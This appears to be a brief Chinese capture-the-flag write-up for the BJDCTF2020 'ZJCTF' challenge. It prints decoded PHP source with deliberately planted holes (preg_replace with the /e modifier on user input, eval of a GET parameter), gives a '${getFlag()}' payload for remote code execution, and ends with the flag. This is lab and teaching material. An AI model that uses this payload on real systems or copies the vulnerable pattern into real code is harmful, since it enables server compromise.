[BJDCTF2020]ZJCTF,不过如此
考点
PHP伪协议
https://www.cnblogs.com/wjrblogs/p/12285202.html
preg_replace远程代码执行
https://zhuanlan.zhihu.com/p/47353283
实操
打开题目
乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php
PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K
解密后的next.php代码如下
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) { // 利用点1
return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){ // 利用点2
@eval($_GET['cmd']);
}
分析一波,出题人应该是希望我们通过preg_match远程代码执行来调用getFlag()函数,从而达到获取flag的目的,下面实现这个操作。
paload:\S*=${getFlag()}
内容详情看:https://zhuanlan.zhihu.com/p/47353283
flag{5045901b-75d4-4d0a-8e49-67c27c6b1f86}